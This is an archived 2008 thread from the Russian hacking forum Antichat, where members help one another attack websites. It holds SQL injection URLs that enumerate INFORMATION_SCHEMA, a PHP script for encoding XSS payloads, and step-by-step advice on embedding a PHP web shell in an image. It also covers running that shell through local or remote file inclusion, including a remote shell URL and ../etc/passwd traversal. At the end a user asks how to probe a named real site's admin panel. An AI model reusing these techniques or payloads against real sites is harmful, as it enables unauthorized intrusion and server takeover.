ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
18.07.2008, 03:36
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
http://www.site.org/article.php?id=80+or+1=(SELECT+TABLE_NAME+FROM+INF ORMATION_SCHEMA.TABLES+LIMIT+1,1)--
При подстановке любого числа в лимит выдаёт одну и ту же страницу.
http://www.site.org/article.php?id=80+order+by+4
Полей *якобы* 4.
http://www.site.org/article.php?id=80+union+select+1,2,3,4
The used SELECT statements have a different number of columns
Пробывал по всякому,но ничего не вышло.Версия пятая,mysql точно,ибо в ответе сказано,что это mysql.Комменты /* не принимает,что меня,кстати,удивило.(Приним ает только -- )
|
|
|
18.07.2008, 03:41
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544
Репутация:
1559
|
|
ссылку кинь в пм )
|
|
|
|
18.07.2008, 10:21
|
|
Участник форума
Регистрация: 02.01.2007
Сообщений: 202
Провел на форуме:
868377
Репутация:
99
|
|
у меня такой вот вопрос, может не совсем по теме, но все-же нужно для эксплотирования уязвимости.
Как перевести обыкновенные символы (допустим <script>123</script> в код, типа
%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%7 8%74%2F%6A
???
Припомощи какой проги это делатся?
Мне просто нужно будет и скрипты и URL в такой код перевести. |
|
|
|
18.07.2008, 10:37
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
вот держи сайт http://ha.ckers.org/xss.html там думаю разберешся в функциях
|
|
|
|
18.07.2008, 11:04
|
|
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
Сообщение от schut123
у меня такой вот вопрос, может не совсем по теме, но все-же нужно для эксплотирования уязвимости.
Как перевести обыкновенные символы (допустим <script>123</script> в код, типа
???
Припомощи какой проги это делатся?
Мне просто нужно будет и скрипты и URL в такой код перевести.
PHP код:
<?
if (!isset($_GET['a']))
{
die('?a=string');
}
$a = $_GET['a'];
$len = strlen($a);
$b = '';
for($i = 0; $i < $len; $i++)
{
$b = $b.'%'.dechex(ord($a[$i]));
}
echo $b."\r\n";
?>
|
|
|
|
18.07.2008, 12:40
|
|
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
Провел на форуме:
1050662
Репутация:
435
|
|
Вообщем вопрос, как залить шелл картинкой, нираз читал про это, поидеи что нам нужно так это изменить код картинки и иметь где либо на сайте баг для исполнения пхп кода?
|
|
|
|
18.07.2008, 14:17
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Сообщение от Sharingan
Вообщем вопрос, как залить шелл картинкой, нираз читал про это, поидеи что нам нужно так это изменить код картинки и иметь где либо на сайте баг для исполнения пхп кода?
Берёшь обычную .gif/.png/.jpg картинку, открываешь любым HexViewer'om или Notepad++ (им кстати удобней), и после того что там уже изачально было (сигнатура и прочее гомно), добавляешь .php код. Далее заливаешь на нужный тебе сайт, и если там есть локальный инклуд (для ремоута сразу проще ссылку на шелл вбить), прописываешь путь до твоей картинки на сайте. При выполнении функций include()/include_once() .php код выполнится, в каком бы расширении файла он не находился.
|
|
|
|
18.07.2008, 15:10
|
|
Новичок
Регистрация: 22.05.2008
Сообщений: 27
Провел на форуме:
80944
Репутация:
0
|
|
Сообщение от .Slip
Берёшь обычную .gif/.png/.jpg картинку, открываешь любым HexViewer'om или Notepad++ (им кстати удобней), и после того что там уже изачально было (сигнатура и прочее гомно), добавляешь .php код. Далее заливаешь на нужный тебе сайт, и если там есть локальный инклуд (для ремоута сразу проще ссылку на шелл вбить), прописываешь путь до твоей картинки на сайте. При выполнении функций include()/include_once() .php код выполнится, в каком бы расширении файла он не находился.
1. Надо ли код картинки оставлять? или просто php код дописать в конце?
2. Можно ли с yandex.naroda.ru делать?
например http://lol.ru?page=http://yandex.narod.ru/zloyshell.jpeg ?
3. Вот инклуд с ../../../etc/passwd как определяется кол-во ../../../ ?
4. как распознать удаленый инклуд от локального?
|
|
|
|
18.07.2008, 15:12
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
Сообщение от 2la.painkiller
1. Надо ли код картинки оставлять? или просто php дописать в конце?
2. Можно ли с yandex.naroda.ru делать?
например http://lol.ru?page=http://yandex.narod.ru/zloyshell.jpeg ?
3. Вот инклуд с ../../../etc/passwd как определяется кол-во ../../../ ?
1.
Сообщение от .Slip
после того что там уже изачально было
2. можно, если удаленный инклюд
3. зависит от количества заданных каталогов в параметре. Т.е. если изначально запрос
include(/var/www/domain/vasya.ru/$page)
то кол-во .. будет равно 4. Но переборщить с .. нельзя) т.е. если в этом примере ты напишешь 30 .., то хуже не будет  выше корня не уйдешь.
4. Пробуешь открыть скрипт, расположенный на др. сервере, если не открывает, то или отключено, или инклуд не удаленный.
Последний раз редактировалось n0ne; 18.07.2008 в 15:19..
|
|
|
|
18.07.2008, 15:17
|
|
Новичок
Регистрация: 22.05.2008
Сообщений: 27
Провел на форуме:
80944
Репутация:
0
|
|
спс всем! %)
а на счет админки http://www.mirf1.ru/
как или какими прогамми можно узнать строение сайта?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
